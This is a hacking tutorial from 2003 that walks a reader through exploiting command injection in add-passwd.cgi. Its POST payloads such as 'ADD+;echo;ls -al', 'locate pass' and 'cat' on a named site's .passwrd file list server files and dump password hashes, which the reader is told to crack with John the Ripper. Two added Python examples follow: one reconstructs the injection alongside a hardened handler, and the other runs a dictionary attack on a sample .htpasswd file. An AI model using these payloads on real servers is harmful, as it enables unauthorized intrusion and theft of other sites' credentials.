
add-passwd.cgi by Energy

Open the HTTP debugger in AccessDiver (it's under the extra tools)
and we will work on this one together.
When you get something like the following, it means you have a path to the server, not only to this site
(to the whole server, with all the sites on it).
First you have to understand that this is a Unix or Linux operating system.
server info: 
HTTP/1.0 200 OK 
Date: Fri, 28 Mar 2003 12:47:54 GMT 
Server: Apache/1.3.26 (Unix) PHP/4.1.1 
Content-Type: text/plain 
X-Cache: MISS from 
Proxy-Connection: close 
So we will start with some basic commands:
dir /a (list everything, hidden files included) = ls -al
to list the directory one level up = ls -al ../
and so on = ls -al ../../../ for as many levels as you want
(I know you don't understand yet; just follow along for now.)
Now you have to set up your HTTP debugger, so go in and:
tick "post data" on the right side
tick "post data" at the bottom left
type in the HTTP server (the target host)
tick "set proxy" and put a good proxy there
under mode, tick POST
Now that you have ticked post data you see a window open; type there
ADD+;echo;ls -al
and connect!
(The + is a URL-encoded space, and the ; ends the command the script meant to run, so everything after it is executed as the web server's user. That is why you get the listing below.)
total 40 
drwxr-sr-x 2 bshaw www-data 4096 Jan 29 2002 . 
drwxr-sr-x 7 bshaw www-data 4096 Mar 26 15:33 .. 
-rwxr-xr-x 1 bshaw www-data 7337 Jan 25 2002 add-passwd.cgi 
-rwxr-xr-x 1 bshaw www-data 20706 Jan 29 2002 w_mem.cgi 
(First of all, this means you can also use the cgi-bin/w_mem.cgi exploit.)
Now you see the first directory on the server: the one the script lives in, with .. as its parent.
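To make clear what the ADD+;echo;ls -al payload is doing, here is an added example (not code from the original page, and not the real add-passwd.cgi, whose source is not shown): a hypothetical reconstruction of the bug, where the form value is pasted into a shell command string, beside a hardened handler that allow-lists the value and never goes through a shell. The field name cmd, the echo stand-in for the script's real command, and the sample POST bodies are all assumptions made up for the demo.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Constructed POST body modelled on the page's payload "ADD+;echo;ls -al".
# The field name "cmd" is an assumption: the page only shows the value.
# '+' is a URL-encoded space, so the script receives "ADD ;echo;ls -al".
INJECTED_BODY = "cmd=ADD+;echo;ls+-al"
BENIGN_BODY = "cmd=ADD"


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into a dict.

    Splits only on '&' (never on ';'), so the ';' in the payload stays inside
    the value exactly as the CGI script on the page would have received it.
    """
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def vulnerable_cgi(body):
    """Hypothetical reconstruction of the hole (add-passwd.cgi's source is not
    on the page): the form value is interpolated into a shell command line.
    The shell treats ';' as a command separator, so everything after it runs
    as the web server user, which is exactly what "ADD+;echo;ls -al" relies on.
    """
    value = decode_form(body)["cmd"]
    command = f"echo action={value}"  # stand-in for whatever the real script runs
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def injected_commands(body):
    """Show what the shell would execute after the intended command: split the
    decoded value on shell separators the way the vulnerable path does."""
    value = decode_form(body)["cmd"]
    parts = [p.strip() for p in re.split(r"[;&|]+", value)]
    return [p for p in parts[1:] if p]


def hardened_cgi(body):
    """Same task without the hole: allow-list the value and bypass the shell."""
    value = decode_form(body)["cmd"]
    if not re.fullmatch(r"[A-Z]{1,16}", value):
        raise ValueError(f"rejected form value {value!r}")
    # argv list with shell=False: the value is passed as one argument and is
    # never parsed by a shell, so metacharacters such as ';' mean nothing.
    result = subprocess.run(["echo", f"action={value}"], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print("vulnerable handler output:")
    print(vulnerable_cgi(INJECTED_BODY))
    print("commands smuggled in after the intended one:", injected_commands(INJECTED_BODY))
    try:
        hardened_cgi(INJECTED_BODY)
    except ValueError as err:
        print("hardened handler:", err)
```

Running it, the vulnerable handler prints "action=ADD", a blank line from the bare echo, and then a real directory listing from ls -al; the hardened one rejects the same body before anything is executed.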
Now post
ADD+;echo;locate pass
(with the locate command you can change the word you are looking for,
like .htpasswd or pass or passwords or access ...)
OK, now you connect and you see many things, so I'll just give you a hint:
look for the name of the site you are after, and on the same line
look for one of the words I mentioned!
On this server I see many names, so I'll pick one;
it's for the site you see a little further down.
OK, so now we have to use the cat command, which shows you the content of the file.
So in the post data you type
ADD+;echo;cat /web/sites/goddess/epoch/.passwrd 
Connect, and there you have all the site's passwords.
Now, as you can see, the passwords are not stored in the clear: they are hashed (crypt-style), not encrypted, so there is nothing to "decrypt".
You have to crack them by guessing, which is what John the Ripper (JTR) does.
Bye bye, hope you enjoyed it.
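What JTR does with such a file, shown as an added example that is not from the original page and not John the Ripper's own code: parse user:hash lines in the .htpasswd syntax, recognise the common schemes (traditional 13-character DES crypt(3), $1$ MD5 crypt, Apache's $apr1$, and the unsalted {SHA} scheme), and run a dictionary check against the one scheme that can be reproduced with the standard library alone. The sample file, the placeholder DES and MD5 entries (valid syntax, not hashes of any known password) and the wordlist are all constructed for the demo; the format name strings are this example's own labels.

```python
import base64
import hashlib
import re


def sha_htpasswd(password):
    """Apache's {SHA} scheme: unsalted SHA-1 of the password, base64 encoded."""
    digest = hashlib.sha1(password.encode()).digest()
    return "{SHA}" + base64.b64encode(digest).decode()


# Constructed sample in .htpasswd syntax (user:hash); the page's real file is
# not reproduced.  Only alice's entry is a genuine hash (of "password").
SAMPLE_HTPASSWD = "\n".join([
    "alice:" + sha_htpasswd("password"),
    "bob:ab1Cdef2GhIJK",                            # 13-char DES crypt(3) placeholder
    "carol:$apr1$saltsalt$fakehashfakehashfakeha",  # $apr1$ placeholder
    "dave:$1$saltsalt$fakehashfakehashfakeha",      # $1$ md5crypt placeholder
    "# comments and blank lines are ignored",
    "",
    "eve:plaintext-not-a-hash",                     # matches no scheme
])

# Constructed wordlist standing in for what JTR would feed from a dictionary.
WORDLIST = ["123456", "letmein", "qwerty", "password", "admin"]

# Recognisers for the schemes commonly found in .htpasswd files.
SCHEMES = [
    ("sha1-base64 ({SHA})", re.compile(r"\{SHA\}[A-Za-z0-9+/]{27}=")),
    ("apache md5 ($apr1$)", re.compile(r"\$apr1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}")),
    ("md5crypt ($1$)", re.compile(r"\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}")),
    ("des crypt(3)", re.compile(r"[./0-9A-Za-z]{13}")),
]


def parse_htpasswd(text):
    """Return (user, hash) pairs, skipping blank lines and '#' comments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, _, stored = line.partition(":")
        entries.append((user, stored))
    return entries


def identify(stored):
    """Name the hashing scheme of one stored value, or 'unknown'."""
    for name, pattern in SCHEMES:
        if pattern.fullmatch(stored):
            return name
    return "unknown"


def crack_sha(stored, wordlist):
    """Dictionary attack on an unsalted {SHA} entry: hash each guess and
    compare.  Salted schemes (crypt, $1$, $apr1$) need the per-entry salt
    folded in and a crypt implementation, which is what JTR provides."""
    if identify(stored) != "sha1-base64 ({SHA})":
        return None
    for guess in wordlist:
        if sha_htpasswd(guess) == stored:
            return guess
    return None


def audit(text, wordlist):
    """Scheme per user plus any password recovered from the wordlist."""
    return [(user, identify(stored), crack_sha(stored, wordlist))
            for user, stored in parse_htpasswd(text)]


if __name__ == "__main__":
    for user, scheme, cracked in audit(SAMPLE_HTPASSWD, WORDLIST):
        print(f"{user:8} {scheme:24} {cracked or '-'}")
```

For the salted schemes the same loop would need the salt from each entry and a crypt(3)/md5crypt implementation, and each guess has to be hashed once per distinct salt rather than once per file; that cost, plus optimised hashing, is the reason to hand the file to JTR instead of a script like this.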